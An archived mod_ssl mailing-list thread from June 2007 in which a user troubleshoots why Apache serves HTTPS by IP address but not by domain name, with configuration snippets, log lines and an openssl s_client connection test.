-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =

On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 09:53
To: modssl-users@modssl.org
Subject: Ref : RE: Ref : RE: SSL by Domain Name Error


No, you speak here about the url to access your web server.=20
What I ment is : when you configure your virtual host in httpd.conf, if=20
you want it to run in https mod, you have to set up the virtual host=20
directive with an IP an not with a host name:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will work


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will not

Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
19/06/2007 10:08
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: Ref : RE: SSL by Domain Name Error


I read this on other posts, so does that mean I'll never be able to=20
configure my apache set up to be accessed like this :-

https:\\www.mydomain.com


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =


On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 08:47
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org; owner-modssl-users@modssl.org
Subject: Ref : RE: SSL by Domain Name Error


Virutal host name based doesn't work with ssl mod
you must configure ssl with ip based virtual hosts


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
18/06/2007 18:30
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: SSL by Domain Name Error


Unfortunately exactly the same, I've even put the domain name as the=20
virtual host and it behaves the same !!!

(i.e )

I was thinking that the way the web server is set up is by "web=20
forwarding", where the holders of our domain name forward requests onto=20
the ip address of our web server. This works for http, could it be=20
possible that something needs configuring at the company that holds our=20
domain name (easily.co.uk) to forward on https requests, or is that a real =


long shot ?



-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =


On Behalf Of Omar W. Hannet
Sent: 18 June 2007 17:06
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
>=20
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
>=20
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>> Anybody have any suggestions ?
>=20
>>     Have created the key through open ssl and configured apache
(using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works"
page
>>     through both IP address and domain name.
>>=20
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help=20
>> !!!
>=20
> You might try adding a NameVirtualHost directive:
>=20
> NameVirtualHost 1.2.3.4:443
>=20
> (Your own IP address in place of '1.2.3.4'.)
>=20
> If that doesn't help, please show us the  block for this=20
> domain in your current Apache configuration.
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
1zjrSD8hWEe96repmpaOSdLMvmLORniQDfYJTSjBfD!nkU9R0u8dlLFoNT85Zo6jf9yegQzk
pg9iGvxGJKsNeMk8vpdiUWF8qBDGGfaGgdaAcnXV!xUKnI0XzkSD3mUR0s5mD0+fIpcaD4yO
5vBMHXJE1FQ0bouh7TVke8vo28dsfWWo4QK!9LC  to report this email as spam.=20
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=
=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F=5F
Apache Interface to OpenSSL (mod=5Fssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 11:57:57 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 27F0614D887; Tue, 19 Jun 2007 11:57:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-j.mailcontrol.com (cluster-j.mailcontrol.com [86.111.223.190])
	by master.modssl.org (Postfix) with ESMTP id A736914D82E
	for ; Tue, 19 Jun 2007 11:57:56 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly43j.srv.mailcontrol.com (MailControl) with ESMTP id l5J9uJZQ001148
	for ; Tue, 19 Jun 2007 10:56:54 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Tue, 19 Jun 2007 10:58:10 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC314732@clotho.retainagroup.com>
In-Reply-To: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
thread-index: AceyUbAkoUCOy143QjSx0SR9tnli5AAAZ3LA
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-05 (www.mailcontrol.com) on 10.74.0.153
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I can't find an error in the error.log, access.log or ssl.log files.

In the access.log file it logs :-

When accessing the web site via http and the ip address=20

0.0.0.0 - - [19/Jun/2007:10:27:04 +0100] "GET / HTTP/1.1" 304 -

When accessing the web site via https and the ip address=20

0.0.0.0 - - [19/Jun/2007:10:28:12 +0100] "GET / HTTP/1.1" 200 44
0.0.0.0 - - [19/Jun/2007:10:28:12 +0100] "GET /favicon.ico HTTP/1.1" 404 209

When accessing the web site via http and the domain name

0.0.0.0 - - [19/Jun/2007:10:28:39 +0100] "GET / HTTP/1.1" 304 -


No entry for https and domain name in the access.log and a "Internet Explor=
er cannot display the webpage" in ie when trying to get to the server.


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] =
On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 10:08
To: modssl-users@modssl.org
Subject: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error


What is the message in apache error log file ?


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
19/06/2007 11:05
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: Ref : RE: Ref : RE: SSL by Domain Name Error



ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


This is exactly how I've got it set up and unfortunately I can't use SSL=20
through my domain name (https://www.mydomain.com) but can access it via my =
ip address (https://1.2.3.4).


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]=
=20
On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 09:53
To: modssl-users@modssl.org
Subject: Ref : RE: Ref : RE: SSL by Domain Name Error


No, you speak here about the url to access your web server.=20
What I ment is : when you configure your virtual host in httpd.conf, if=20
you want it to run in https mod, you have to set up the virtual host=20
directive with an IP an not with a host name:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will work


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


will not

Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
19/06/2007 10:08
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: Ref : RE: SSL by Domain Name Error


I read this on other posts, so does that mean I'll never be able to=20
configure my apache set up to be accessed like this :-

https:\\www.mydomain.com


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]=
=20

On Behalf Of abel.nivault@dgi.finances.gouv.fr
Sent: 19 June 2007 08:47
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org; owner-modssl-users@modssl.org
Subject: Ref : RE: SSL by Domain Name Error


Virutal host name based doesn't work with ssl mod
you must configure ssl with ip based virtual hosts


Abel NIVAULT
Inspecteur PSE- PSN-CT - CSI LYON abel.nivault@dgi.finances.gouv.fr




"Rob Archer" 
Envoy=E9 par : owner-modssl-users@modssl.org
18/06/2007 18:30
Veuillez r=E9pondre =E0 modssl-users

=20
        Pour :  
        cc :=20
        Objet : RE: SSL by Domain Name Error


Unfortunately exactly the same, I've even put the domain name as the=20
virtual host and it behaves the same !!!

(i.e )

I was thinking that the way the web server is set up is by "web=20
forwarding", where the holders of our domain name forward requests onto=20
the ip address of our web server. This works for http, could it be=20
possible that something needs configuring at the company that holds our=20
domain name (easily.co.uk) to forward on https requests, or is that a real=
=20

long shot ?



-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]=
=20

On Behalf Of Omar W. Hannet
Sent: 18 June 2007 17:06
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


What's the result when you set ServerName to your domain
name within the virtual host?:


ServerName example.com
SSLEngine On
SSLCertificateFile conf/ssl/server.crt
SSLCertificateKeyFile conf/ssl/server.key


Rob Archer wrote:
> Thanks for the response, I'm using the following in the httpd.conf
> file:-
>=20
> 
> SSLMutex default
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> SSLSessionCache none
> ErrorLog logs/ssl.log
> LogLevel info
> 
>=20
> 
> SSLEngine On
> SSLCertificateFile conf/ssl/server.crt
> SSLCertificateKeyFile conf/ssl/server.key
> 
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 18 June 2007 16:13
> To: modssl-users@modssl.org
> Subject: Re: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>> Anybody have any suggestions ?
>=20
>>     Have created the key through open ssl and configured apache
(using
>>     http://raibledesigns.com/wiki/Wiki.jsp?page=3DApacheSSL
> instructions) and
>>     can access https via the IP address of the web server but not the
>>     domain name. When trying to get the to the webserver via the
> domain
>>     name through https it says internet explorer cannot display this
> web
>>     page. Using the normal http protocol I can get the "It Works"
page
>>     through both IP address and domain name.
>>=20
>>     Have tried to get around this by fiddling about with the virtual
>>     hosts settings but haven't found any solution. Can anyone help
>> !!!
>=20
> You might try adding a NameVirtualHost directive:
>=20
> NameVirtualHost 1.2.3.4:443
>=20
> (Your own IP address in place of '1.2.3.4'.)
>=20
> If that doesn't help, please show us the  block for this
> domain in your current Apache configuration.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
1zjrSD8hWEe96repmpaOSdLMvmLORniQDfYJTSjBfD!nkU9R0u8dlLFoNT85Zo6jf9yegQzk
pg9iGvxGJKsNeMk8vpdiUWF8qBDGGfaGgdaAcnXV!xUKnI0XzkSD3mUR0s5mD0+fIpcaD4yO
5vBMHXJE1FQ0bouh7TVke8vo28dsfWWo4QK!9LC  to report this email as spam.=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 18:08:04 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8908614D887; Tue, 19 Jun 2007 18:08:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id BBB5E14D82E
	for ; Tue, 19 Jun 2007 18:08:03 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5JG74BK042884
	for ; Tue, 19 Jun 2007 10:07:05 -0600 (MDT)
Message-ID: <4677FF23.4010708@allez-oop.net>
Date: Tue, 19 Jun 2007 10:06:59 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.4 (X11/20070615)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
References: <59D4AF29ACE8044BB4C34C36A08A03AC314732@clotho.retainagroup.com>
In-Reply-To: <59D4AF29ACE8044BB4C34C36A08A03AC314732@clotho.retainagroup.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Rob Archer wrote:

> No entry for https and domain name in the access.log and a "Internet Explorer cannot display the webpage" in ie when trying to get to the server.

Do you have access to the openssl command line program?
It would tell you whether you are making a connection, and
possibly shed some light on the problem.  Like this:

openssl s_client -connect www.mydomain.com:443 -debug
GET /

-- 
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 18:20:25 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4543D14D887; Tue, 19 Jun 2007 18:20:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-j.mailcontrol.com (cluster-j.mailcontrol.com [86.111.223.190])
	by master.modssl.org (Postfix) with ESMTP id CD8DF14D82E
	for ; Tue, 19 Jun 2007 18:20:24 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly07j.srv.mailcontrol.com (MailControl) with ESMTP id l5JGJOA9024230
	for ; Tue, 19 Jun 2007 17:19:24 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Tue, 19 Jun 2007 17:20:47 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC314735@clotho.retainagroup.com>
In-Reply-To: <4677FF23.4010708@allez-oop.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL by Domain Name Error
thread-index: AceyjDZBx0U/NE0sSwawYegkRXC0vQAASO0Q
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.74.0.117
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

When accessing it by ip address using the debug option of openssl it
returns what you would expect (i.e. the text of the key certificate).

When accessing by domain name it says :-

Loading 'screen' into random state - done
Connect: bad file descriptor
Connect:errno=3D10060


I assume this is the equivalent of the "Internet Explorer cannot display
the webpage" error in IE !!!


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: 19 June 2007 17:07
To: modssl-users@modssl.org
Subject: Re: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error


Rob Archer wrote:

> No entry for https and domain name in the access.log and a "Internet=20
> Explorer cannot display the webpage" in ie when trying to get to the=20
> server.

Do you have access to the openssl command line program?
It would tell you whether you are making a connection, and possibly shed
some light on the problem.  Like this:

openssl s_client -connect www.mydomain.com:443 -debug
GET /

--=20
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
fEC2jdu7IGByacx3ArIKIUT!lvVH!USL09885GdzcRHkJQbUg!t!lTlF8wvspJ8KRJ!C1T7b
oyyYNM1LsOoq7xQn9PpPmf0RViWH8KrV2XgKm6g+xXis8qqUS8WsUnUSQI75M3p9YidETs!4
SYY9PML3cPraQ8WwaBWlXfwQkELAaC8nK3p6uY3  to report this email as spam.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 18:29:28 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 13B5214D9E4; Tue, 19 Jun 2007 18:29:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id 83B1C14D89D
	for ; Tue, 19 Jun 2007 18:29:24 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5JGSTSS055285
	for ; Tue, 19 Jun 2007 10:28:29 -0600 (MDT)
Message-ID: <46780428.3090407@allez-oop.net>
Date: Tue, 19 Jun 2007 10:28:24 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.4 (X11/20070615)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error
References: <59D4AF29ACE8044BB4C34C36A08A03AC314735@clotho.retainagroup.com>
In-Reply-To: <59D4AF29ACE8044BB4C34C36A08A03AC314735@clotho.retainagroup.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'll bet you're right when you say your provider may not be
forwarding https requests properly.  I'd run this one past
them and see what they have to say about it.

Rob Archer wrote:
> When accessing it by ip address using the debug option of openssl it
> returns what you would expect (i.e. the text of the key certificate).
> 
> When accessing by domain name it says :-
> 
> Loading 'screen' into random state - done
> Connect: bad file descriptor
> Connect:errno=10060
> 
> 
> I assume this is the equivalent of the "Internet Explorer cannot display
> the webpage" error in IE !!!
> 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 19 June 2007 17:07
> To: modssl-users@modssl.org
> Subject: Re: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
> 
> 
> Rob Archer wrote:
> 
>> No entry for https and domain name in the access.log and a "Internet 
>> Explorer cannot display the webpage" in ie when trying to get to the 
>> server.
> 
> Do you have access to the openssl command line program?
> It would tell you whether you are making a connection, and possibly shed
> some light on the problem.  Like this:
> 
> openssl s_client -connect www.mydomain.com:443 -debug
> GET /

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 18:36:48 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6010D14D89D; Tue, 19 Jun 2007 18:36:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cluster-e.mailcontrol.com (cluster-e.mailcontrol.com [217.79.216.190])
	by master.modssl.org (Postfix) with ESMTP id 11FD714D85B
	for ; Tue, 19 Jun 2007 18:36:47 +0200 (CEST)
Received: from clotho.retainagroup.com (no-dns-yet-assigned.orbital.net [80.88.213.165] (may be forged))
	by rly08e.srv.mailcontrol.com (MailControl) with ESMTP id l5JGZjwG000793
	for ; Tue, 19 Jun 2007 17:35:47 +0100
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL by Domain Name Error
X-MimeOLE: Produced By Microsoft Exchange V6.5
Date: Tue, 19 Jun 2007 17:37:09 +0100
Message-ID: <59D4AF29ACE8044BB4C34C36A08A03AC314736@clotho.retainagroup.com>
In-Reply-To: <46780428.3090407@allez-oop.net>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL by Domain Name Error
thread-index: AceyjzcOqMgcBXKwTOmXEGeH33uDAAAANIog
From: "Rob Archer" 
To: 
X-Scanned-By: MailControl A-07-07-10 (www.mailcontrol.com) on 10.69.0.118
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rob Archer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'll have a word with them tomorrow see what they say !!!

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
Sent: 19 June 2007 17:28
To: modssl-users@modssl.org
Subject: Re: SSL by Domain Name Error


I'll bet you're right when you say your provider may not be forwarding
https requests properly.  I'd run this one past them and see what they
have to say about it.

Rob Archer wrote:
> When accessing it by ip address using the debug option of openssl it=20
> returns what you would expect (i.e. the text of the key certificate).
>=20
> When accessing by domain name it says :-
>=20
> Loading 'screen' into random state - done
> Connect: bad file descriptor
> Connect:errno=3D10060
>=20
>=20
> I assume this is the equivalent of the "Internet Explorer cannot=20
> display the webpage" error in IE !!!
>=20
>=20
> -----Original Message-----
> From: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Omar W. Hannet
> Sent: 19 June 2007 17:07
> To: modssl-users@modssl.org
> Subject: Re: Ref : RE: Ref : RE: Ref : RE: SSL by Domain Name Error
>=20
>=20
> Rob Archer wrote:
>=20
>> No entry for https and domain name in the access.log and a "Internet
>> Explorer cannot display the webpage" in ie when trying to get to the=20
>> server.
>=20
> Do you have access to the openssl command line program?
> It would tell you whether you are making a connection, and possibly=20
> shed some light on the problem.  Like this:
>=20
> openssl s_client -connect www.mydomain.com:443 -debug
> GET /

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 Click
https://www.mailcontrol.com/sr/wQw0zmjPoHdJTZGyOCrrhg=3D=3D
NoIrNOBa4kXlVepWQxhvS70n7wnaGifHgxpDYH9XzgnhdWNGqAEoj0QjdX2jmb6nMJ8gJruT
33EzOK5GVXfbNyKb+LzKW!I6Mmqa51c3EUWCLSmoTIRNb1cRcyi5C3p!RNtjA2lYb5YgUOqG
mlb5L!FRO2AUfWDh4BWlXfwQkELAaC8nK3p6uY3  to report this email as spam.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 19 19:36:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5597414D870; Tue, 19 Jun 2007 19:36:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id BEFDB14D82E
